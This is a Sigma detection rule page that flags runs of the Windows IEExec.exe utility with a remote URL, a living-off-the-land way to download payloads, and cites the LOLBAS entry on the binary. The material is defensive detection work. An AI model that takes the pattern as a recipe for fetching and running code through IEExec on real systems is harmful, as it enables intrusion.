Abusing IEExec To Download Payloads
Detects execution of the IEExec utility to download payloads
Sigma rule (View on GitHub)
1title: Abusing IEExec To Download Payloads
2id: 9801abb8-e297-4dbf-9fbd-57dde0e830ad
3status: experimental
4description: Detects execution of the IEExec utility to download payloads
5references:
6 - https://lolbas-project.github.io/lolbas/Binaries/Ieexec/
7author: Nasreddine Bencherchali (Nextron Systems)
8date: 2022/05/16
9tags:
10 - attack.command_and_control
11 - attack.t1105
12logsource:
13 category: process_creation
14 product: windows
15detection:
16 lolbas:
17 - Image|endswith: '\IEExec.exe'
18 - OriginalFileName: 'IEExec.exe'
19 remote:
20 CommandLine|contains:
21 - 'https://'
22 - 'http://'
23 condition: lolbas and remote
24falsepositives:
25 - Unknown
26level: high
References
-
.. /Ieexec.exe Star Download Execute The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe applicat...
Read More
Related rules
- Password Protected ZIP File Opened (Suspicious Filenames)
- Potential COM Objects Download Cradles Usage - PS Script
- Potential COM Objects Download Cradles Usage - Process Creation
- Potential DLL File Download Via PowerShell Invoke-WebRequest
- PowerShell Web Download